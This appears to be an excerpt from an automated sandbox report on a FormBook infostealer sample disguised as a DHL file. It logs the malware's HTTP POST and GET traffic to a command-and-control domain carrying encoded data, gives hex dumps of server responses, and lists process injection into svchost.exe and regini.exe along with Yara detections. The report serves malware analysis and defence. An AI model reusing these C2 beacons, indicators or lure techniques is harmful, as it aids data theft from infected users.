                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:06.469810009 CET1236INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                            Dec 6, 2024 17:39:06.469820976 CET448INData Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:06.469961882 CET1236INData Raw: 52 42 83 57 22 f4 08 e7 a5 84 86 af 44 e8 11 ce 4b 09 8d 5e 89 d0 23 9c 97 12 ba 78 25 42 8f 70 5e 46 68 a1 95 65 16 fc de 95 17 41 f2 70 76 f6 06 3f 1d 6e 68 99 4c 99 b1 a0 b9 b9 f3 03 88 95 06 b2 28 ef df 84 4a 5a 90 d6 27 e7 e7 e3 2a 32 e3 91
                                                                            Data Ascii: RBW"DK^#x%Bp^FheApv?nhL(JZ'*2M}4dXOPDBF>2tSk0`)PH3IXh$<9sy^s=\\Wop-FO]g bp\.7I]*rKiY0X|=.~J.e?v
                                                                            Dec 6, 2024 17:39:06.469973087 CET1236INData Raw: f7 f2 7b 62 94 e0 11 f9 ec 7a e8 fe 70 59 f7 6e 36 c7 6f b9 37 8c ac 24 f5 87 f9 fd ab 71 78 c2 4d be 54 12 d6 de 61 11 2f 9c 3f 56 44 3c f2 ef 41 c5 8f 55 58 98 85 2a ac db 51 c9 e8 f5 7a 3e 01 d4 5a 6c 89 4e ae 70 da fd cc 0e 13 3c 91 21 48 34
                                                                            Data Ascii: {bzpYn6o7$qxMTa/?VD<AUX*Qz>ZlNp<!H4>+ 1h3>:8btX(fk\MKx49pI*?1gEUh"'rwlH]"{5S@3\Ly"\yeNI*%b9UCk%xD>=
                                                                            Dec 6, 2024 17:39:06.469985008 CET1236INData Raw: 6f 7f c6 82 5e 14 c3 4e ab 94 7d 74 72 cc e4 4b fb c4 8c 85 ec aa fd 59 c4 22 0f c2 1d 6c 53 04 51 81 86 57 82 4f 5f 2c 53 cc 62 06 bd f6 67 17 97 ec e2 b2 b7 83 cf ac ca 78 88 32 01 cb 5e 0c 1f 45 97 d7 cc 6d 63 c8 46 d7 3b f0 d2 19 ca a4 2c 7a
                                                                            Data Ascii: o^N}trKY"lSQWO_,Sbgx2^EmcF;,z1@m0GreP0FKPI!0;VgGXO~*w.UT:c6otYNi,[2J-e'8?&WGb%ivVxd:"q45Z"&lK%S
                                                                            Dec 6, 2024 17:39:06.470098019 CET1236INData Raw: fa de 65 7b 78 81 ff 4f 35 9f 82 9e af 57 c1 e6 ae ed ca 0d dc a4 65 ec e8 12 fa 83 ab f6 f2 bb f1 c0 c5 35 0a 32 6c f7 ae 47 4f b5 0f 95 12 ae e7 8c e9 8c 9a 1c 42 ab 8b ec 68 c3 cb 21 f6 1a ba c5 6f 79 ae d7 ee f5 dd ea af 5b a4 bf ad 80 5b 0c
                                                                            Data Ascii: e{xO5We52lGOBh!oy[[J0\pXbs5Z}|(T:GR][4m-P:V?Gz)06VQ%}?QaNqW(ubBxWOB`Ur}_\1zOuC
                                                                            Dec 6, 2024 17:39:06.470109940 CET1236INData Raw: 55 b3 c7 0e db 66 bb a8 e7 fa 34 c6 86 f0 a2 8e ee 93 00 5f d6 76 5e ce f0 2c 44 f4 87 b1 9a 71 09 d1 a7 4e b7 0f f5 d2 21 f7 70 5e 6f d6 58 c0 7d 6b b1 bd ee 83 a9 89 e6 d1 5e ea de 1a 90 59 87 09 9e 48 01 b1 5d 60 84 21 2b 77 5e 71 e2 52 e0 08
                                                                            Data Ascii: Uf4_v^,DqN!p^oX}k^YH]`!+w^qRv%1\t\#72lc{CJV'Yer~]4u-Z67jK@\j!{:M}2eI,8\PHZ#8K\yT4';EM>qo{k3r
                                                                            Dec 6, 2024 17:39:06.470123053 CET1236INData Raw: 9f 8c 4c fb 35 d8 a1 92 56 33 63 3f 09 7d 05 72 0c ff d3 f8 6f 60 8e f5 18 bc 4e 8f 41 4d 0f 16 86 20 3f 4d a5 0a e2 30 f6 a7 29 b4 02 39 8c ff 69 ea ac 40 0e e3 0f 5f 03 7f 78 18 7f f4 1a f8 a3 1a fc 40 20 0c 0d 94 8e 40 af 80 b7 5e 8e 80 96 95
                                                                            Data Ascii: L5V3c?}ro`NAM ?M0)9i@_x@ @^u37)M4|,^^V L|)j^AE*V-f2y*HOwdY/rpGgV~v!iM0vOiQk0C%fuU|e|7
                                                                            Dec 6, 2024 17:39:06.470135927 CET1236INData Raw: e9 7a 7d 82 86 c6 6a b0 61 7a ba 80 83 bf cb 28 3d ef ef d3 b6 f7 6f 21 e1 f0 ef 33 4b ff ef d3 76 f0 89 12 3e 02 1c 2e 3e 14 c6 f2 78 5e 66 82 b4 be 9b 00 68 00 76 06 f0 2c b2 15 15 b3 8d 5e b1 9d 69 94 4a 2a f7 53 15 82 80 0c 5b 19 1a 87 ec 7a
                                                                            Data Ascii: z}jaz(=o!3Kv>.>x^fhv,^iJ*S[zt=`00"`p}A?KACmsJZt"8-9jflkpv5v.%<cI TxGq\0.(ss~{vMg}1Fu-Y`@iP'nU^~4g69>nRIj
                                                                            Dec 6, 2024 17:39:06.589989901 CET1236INData Raw: 23 d2 cc d8 3d 4d 81 27 a9 f5 49 cf eb 0f f3 fb d6 0a fa 38 d7 c1 f3 06 7f 2d b4 cd e4 a7 8e be 9c fd 24 05 2e 86 de c9 02 f4 5f 55 80 93 d1 3e 4d 80 9b ee c6 d9 95 c9 49 28 98 31 93 f3 59 4e 63 25 ad a1 42 85 4c 9c df 9e fd c1 bd d2 98 85 b0 58
                                                                            Data Ascii: #=M'I8-$._U>MI(1YNc%BLX2.9*2tx*q6c&c<6:-B(`BIUE>(E6Le^=cU.k%.w%;,7Biuf*-;y|_jCc:RO?w=t{p


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.1250024108.179.253.197805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:39:07.866719007 CET1838OUTPOST /qimy/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Origin: http://www.bloodbalancecaps.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 6b 55 63 78 50 36 38 61 35 31 54 6e 4d 4e 6a 67 4b 79 67 31 4d 6f 4c 43 48 4e 38 57 4e 59 4c 4b 74 6a 42 2b 4d 57 63 6c 6f 6a 36 58 4e 6f 31 31 69 48 48 4b 4e 34 59 6c 6b 46 62 36 6b 53 44 69 79 64 63 42 62 50 4e 63 50 30 6b 61 47 43 30 72 79 52 6e 2b 70 4d 5a 50 6c 39 77 6e 65 36 67 48 59 4c 68 72 75 5a 31 4a 71 67 6c 77 57 66 61 58 74 33 41 6e 66 56 72 50 39 77 4a 48 54 36 4b 38 31 39 57 33 71 6f 52 37 53 54 57 6a 38 5a 74 34 76 44 41 31 4a 64 72 68 46 54 2b 4d 30 38 69 77 41 34 57 72 5a 4b 4e 42 46 77 6b 6e 77 6d 4b 74 39 56 30 71 42 65 69 36 6b 56 62 6e 32 69 45 5a 74 59 36 44 6e 57 36 55 6e 5a 31 59 53 69 74 6a 37 31 54 35 38 72 31 4c 53 78 70 54 43 6d 48 75 38 78 2b 6c 52 59 6f 2f 64 52 76 33 30 36 75 59 4d 36 5a 4c 74 69 34 57 52 51 77 74 51 34 4b 2f 57 6a 32 6a 59 4b 78 36 37 57 58 53 30 4a 2f 31 6d 48 5a 38 69 44 44 7a 63 6f 6d 57 50 72 59 45 49 76 44 4b 46 34 6a 6a 51 30 63 70 65 4a 4d 62 59 77 6d 49 2b 6f 34 4c 33 41 78 43 69 52 4f 34 4a 39 49 44 77 72 78 69 69 73 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=kUcxP68a51TnMNjgKyg1MoLCHN8WNYLKtjB+MWcloj6XNo11iHHKN4YlkFb6kSDiydcBbPNcP0kaGC0ryRn+pMZPl9wne6gHYLhruZ1JqglwWfaXt3AnfVrP9wJHT6K819W3qoR7STWj8Zt4vDA1JdrhFT+M08iwA4WrZKNBFwknwmKt9V0qBei6kVbn2iEZtY6DnW6UnZ1YSitj71T58r1LSxpTCmHu8x+lRYo/dRv306uYM6ZLti4WRQwtQ4K/Wj2jYKx67WXS0J/1mHZ8iDDzcomWPrYEIvDKF4jjQ0cpeJMbYwmI+o4L3AxCiRO4J9IDwrxiisC+erB8EyP2mzPUeRCXuM/cjFFEQ1PnGGhKPfezGi4YZmrOwZnmrNbDwgQzYktRMf675Z3UD9fCZy7hQo/cP4p9ozYNE8pe32WiworE3njwhUXPJl1PE2j6iR6X7cGP+ZMA7opw9e6fnMfnOGP4Aaf9NJ4ZiTaMXfjaKYNTBrHZBnlWzX8TBzEcV4jpjTnsbSJEDqeWKJ6hMZey8UnKdqk3+AVPWRJl3gqw9Fx07Qc1jXQ86t/WShgQ55qFCTDoFTORrCoSq4F6Au4b07Vm3olUgKbfGps7qf3dn9x99LuUDsiK6+fLau6AVbnKm++9RDS/clLLE+pcSeUWz1D/Dn86Ep3xUG8QZJiX3JqLsy1WkzLpUF/qKHA8WdNEM22NN88Jxm15jvutrnCj3oDPVwCSaE9vZcxOcienE1578eNGn07BWIG2dyknmKXnns2KKnflpzT9TsT3s4a7sKOHE8Fe78jA6Mxj0lVTJ5JYkTWz46CEqWB0AK+v4B0jHJLTFstZaD9UhdxKcC3F+MWMrwp5hcEj7oWZG7vUOUUSG+w6d6MmqqCUzE6slLOiEWK+Y0JZhlwIRrjfhYeNMq36EJMXiTy2PIXghyn+FtS1xqvCZxcf+XWWaltQRpB0dzZz2yzeCc1cygbRFn/qNYqx7XsJwu4Jn3TO44Q4 [TRUNCATED]
                                                                            Dec 6, 2024 17:39:09.095515966 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:39:08 GMT
                                                                            Server: Apache
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            Content-Length: 15183
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 [TRUNCATED]
                                                                            Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ 1s#N"h&\r&d&g\@Ys9=K\_0yE[%>7f`Um*Vf\R.4<IoT<t+tlcKdR,b7FpyG4y$sirB(`(s!M*/'6% v,Jv1^BjLUFjmn1fvDfUseN#l1=qY,L}?\&L0/5YGnik[:^gKh7b}'i2<,,O]:h?Pl_KwCQDSZq`~?=\vzYsi4q!C&ob4Qm*N&V;;Y"?XM3:S&!nA(Xnq}<7mkn7G6w&#n^SIj[Ot5p,I&rg@w"Ll
                                                                            Dec 6, 2024 17:39:09.095557928 CET1236INData Raw: b5 f5 a4 f9 09 9c 64 c9 a9 fd 5a 6c 5a 63 0d b6 d0 92 d8 0e a0 09 e6 cd f5 5e 51 be d6 62 79 09 93 c9 44 ff 6c 7f 7d 68 6d 04 2e 56 02 9b 19 77 f2 63 76 88 8e 6a c4 82 25 0d 7f 59 e8 60 1a bf 14 d1 d5 20 c4 67 1c 0f 7e 29 62 f0 e2 5f 8a be e7 45
                                                                            Data Ascii: dZlZc^QbyDl}hm.Vwcvj%Y` g~)b_E`Uq0-Ikml<h_U [/xl`3:3_M2\JEF"4n@>&\Zb~5WDm>eI\Bx;TLY; T/pi,am
                                                                            Dec 6, 2024 17:39:09.095570087 CET1236INData Raw: 25 fe 0c 5b 40 f3 80 30 e5 2a a9 56 85 8c 20 6a ed b1 bb c6 0f 6a e2 56 ef d2 8e 6c de 72 8b 30 c7 56 5f 66 d4 ef 7e 7f fa 32 75 c5 9b b5 16 a1 12 4a af a4 1a c7 4a 5a 1a b3 8c 8b f9 6e cc ed 76 2f e2 d8 ee 86 66 d5 1e 57 31 81 fe 46 12 26 67 a1
                                                                            Data Ascii: %[@0*V jjVlr0V_f~2uJJZnv/fW1F&goyj+ TYzuIP0ML*\J5t$5d;'X,AKpc1lrny\(mGqwL7V`1,KJFXA#!,93EX=X
                                                                            Dec 6, 2024 17:39:09.095634937 CET1236INData Raw: 9f 98 69 b2 58 66 55 fb 18 67 d8 7a 19 e9 0f b1 b9 7b 9f f1 c8 a6 d5 6b 75 5c e6 c6 5c 08 3f 2c b4 06 69 df b9 7d 8c d7 12 95 62 fa a5 ae 81 c2 56 eb 05 1f a2 d2 5a 04 38 26 68 bf 97 df 13 a3 04 8f c8 67 61 18 8e 57 76 b9 c0 b0 53 a3 66 16 2e 0d
                                                                            Data Ascii: iXfUgz{ku\\?,i}bVZ8&hgaWvSf.4strM.gUA~9Y>,8e^4! Ih5{5{7]-lKFW"\JM#f+}\i}DTI1']XR5nCoMr/3Q X]M'4UtE
                                                                            Dec 6, 2024 17:39:09.095675945 CET1236INData Raw: e9 64 71 f6 e6 4d c4 4d 2e d8 dc 27 55 11 79 cb b3 5c 69 cb a4 1d e3 6d 80 56 00 ed 13 a9 6a ae 70 d3 29 8b d0 68 75 d7 29 f0 24 b5 3e e9 a1 57 77 6f aa 69 6a 2e 32 a6 13 2e 7d e2 11 af e3 5d 3e ba 5e 89 53 49 e3 13 ea 75 1e 63 04 2c bc 4b b4 2a
                                                                            Data Ascii: dqMM.'Uy\imVjp)hu)$>Wwoij.2.}]>^SIuc,K*dT*gQez\fz+J1Egwl\MNkvPVhEzO&v~<bWO&{0N,BX}Qg2td>~2s\Ln@h=!
                                                                            Dec 6, 2024 17:39:09.095691919 CET1236INData Raw: f9 5b c1 34 f8 a4 37 3e 96 35 a4 03 9f 0c bb 83 a3 49 03 3a f4 c9 a0 3b 7c 22 a9 ef 92 fa 47 93 fa ae 5d ff 89 76 bd 0b 7a 8d bc 2f ba d7 47 d3 ae 31 d1 27 d7 dd de c5 5e 5a a8 84 42 9d 03 c1 c2 3b 9f 7c e6 95 9f fa 9c 70 ce 70 2b a2 e0 26 a5 89
                                                                            Data Ascii: [47>5I:;|"G]vz/G1'^ZB;|pp+&fsLgAp\RnQS34/"vY7SQqP't*@i&jXv%ap'E*~Da0:~'"j#v 1lzvReKF=80cL;|tV3c1W~
                                                                            Dec 6, 2024 17:39:09.095705032 CET1236INData Raw: c4 ec 41 67 70 85 99 87 52 ae 30 65 d4 f1 2e 8e a4 f4 30 a5 57 73 9f b2 48 cd 28 95 cc 16 9a 09 9f 5c e4 f7 e5 f7 1a bf 3a 09 58 d3 6b 93 e5 7f a7 ff 88 e3 b2 3a 02 c8 11 be 8f 35 e5 63 e4 d5 54 0f 0f 55 e3 af ce 37 9d eb 6a 0f 76 56 85 15 5c 42
                                                                            Data Ascii: AgpR0e.0WsH(\:Xk:5cTU7jvV\B[N+hnX?z:qGPPssV>Z)K0v.DDP@}&x^fydL'\BnBwosEnV!)6#iVeOUi-<efE|yE@$OY[$OCnI
                                                                            Dec 6, 2024 17:39:09.095848083 CET1236INData Raw: 6e 93 63 45 c4 15 89 79 52 73 07 59 00 d1 81 bb 84 09 01 7a 7e e0 96 67 2c 81 03 77 96 05 e2 d0 dd 94 47 b0 cd a6 b5 78 8e 0f 62 3c d3 98 65 5c cc eb 2a b6 ae 51 2a 15 cd 97 15 86 7f 04 9f 78 9d 2b 0d d9 f8 a1 93 32 83 6c 70 3d 55 8b 27 19 94 b9
                                                                            Data Ascii: ncEyRsYz~g,wGxb<e\*Q*x+2lp=U'-gILeMJ' RnD2#gh<g_57!:k_%KU@f29u{0~YORBOD+;9bS%-:{UqByUIbH.B_*i53DU1S
                                                                            Dec 6, 2024 17:39:09.095861912 CET1236INData Raw: 54 ba 2c f1 89 54 12 5e 07 dc 4f d5 14 74 4d 8b 42 46 a0 9d 0a 87 fb 18 60 3a 4c c9 7e e0 fd 7b c1 02 10 ed 47 17 35 99 5c e6 85 3d 29 73 49 b8 d2 d8 f0 8f 70 d0 11 ee 12 fd 90 31 21 5a b8 fd 67 72 2f 19 b5 16 81 d2 38 3f d5 2c e2 85 f1 3b 83 81
                                                                            Data Ascii: T,T^OtMBF`:L~{G5\=)sIp1!Zgr/8?,;!vm?XZ\7$U#;'[JR^i53[xKY juMiP,oz&i6{cEhoI,q\ T9W$>SF lyKej- TY'uTM
                                                                            Dec 6, 2024 17:39:09.095874071 CET1236INData Raw: 22 b7 67 8b e5 bd 69 f8 8b c6 1f 66 4a 47 b9 06 63 7e e9 72 44 d5 2c b4 7c ca ed bc e1 37 52 6b 73 ff 97 ee 2f dd 40 28 15 05 4c 30 19 42 c8 72 d3 41 9d f3 5f dc 30 5c 86 a2 88 00 8b 3f e0 37 e2 c6 fe d2 ad a8 d0 4c 45 85 80 7d 58 f7 1a c1 7d 27
                                                                            Data Ascii: "gifJGc~rD,|7Rks/@(L0BrA_0\?7LE}X}'~z]WupvDB!v:T";WQ+IlUW8y5+y7G-k3%"9cc`lX16jsMh^121
                                                                            Dec 6, 2024 17:39:09.217664957 CET1236INData Raw: dc 54 a4 4c 46 02 5c cd 7f ad ae ca 9a db 1b 33 4d c8 8c 47 36 9d 34 fa c3 06 49 c1 39 a2 3a df 67 42 e2 08 a9 b5 b9 df ed ce 66 b3 ce 6c d0 51 3a e9 f6 3d cf eb 62 61 83 4c 39 cc be 56 f7 93 86 47 3c d2 1f 12 57 56 09 c5 a3 08 b0 bd d5 05 34 48
                                                                            Data Ascii: TLF\3MG64I9:gBflQ:=baL9VG<WV4H\t,q5V4z=g';jv[JsWBpGF"&hoo9%uU[a,\FuEk!N2!|kUnH]UkYeTP~BY8gB%{{q.


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.1250025108.179.253.197805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:39:10.528973103 CET523OUTGET /qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.bloodbalancecaps.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:39:11.746264935 CET560INHTTP/1.1 301 Moved Permanently
                                                                            Date: Fri, 06 Dec 2024 16:39:11 GMT
                                                                            Server: nginx/1.23.4
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 0
                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                            X-Redirect-By: WordPress
                                                                            Location: http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ=
                                                                            X-Endurance-Cache-Level: 2
                                                                            X-nginx-cache: WordPress
                                                                            X-Server-Cache: true
                                                                            X-Proxy-Cache: MISS


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:11:35:08
                                                                            Start date:06/12/2024
                                                                            Path:C:\Users\user\Desktop\DHL_734825510.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DHL_734825510.exe"
                                                                            Imagebase:0x6e0000
                                                                            File size:743'936 bytes
                                                                            MD5 hash:3AAE187307A535DF90ED8F9FAA0341D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:11:35:12
                                                                            Start date:06/12/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\DHL_734825510.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:11:35:31
                                                                            Start date:06/12/2024
                                                                            Path:C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe"
                                                                            Imagebase:0xcb0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:11:35:33
                                                                            Start date:06/12/2024
                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                            Imagebase:0xc0000
                                                                            File size:41'472 bytes
                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:7
                                                                            Start time:11:35:47
                                                                            Start date:06/12/2024
